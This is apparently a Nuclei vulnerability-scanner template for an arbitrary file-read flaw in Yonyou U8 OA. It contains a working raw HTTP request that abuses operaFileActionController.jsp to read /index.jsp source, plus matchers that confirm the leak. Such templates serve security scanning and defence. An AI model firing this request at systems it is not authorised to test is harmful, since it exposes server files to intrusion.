id: yonyou-u8-operafileactioncontroller-fileread
info:
  name: 用友 U8 OA operafileactioncontroller - fileread
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/OracleNep/Nday-Exploit-Plan/blob/main/CNVD/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8BU8%20OA%20operafileactioncontroller%20%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/1.png
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
  tags: 2024,yonyou,oa,u8,fileread

http:
  - raw:
      - |
        GET /yyoa/portal/style/controller/operaFileActionController.jsp?path=/index.jsp&fileop=find HTTP/1.1
        Host: {{Hostname}}
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,'<%@page','seeyon')
        condition: and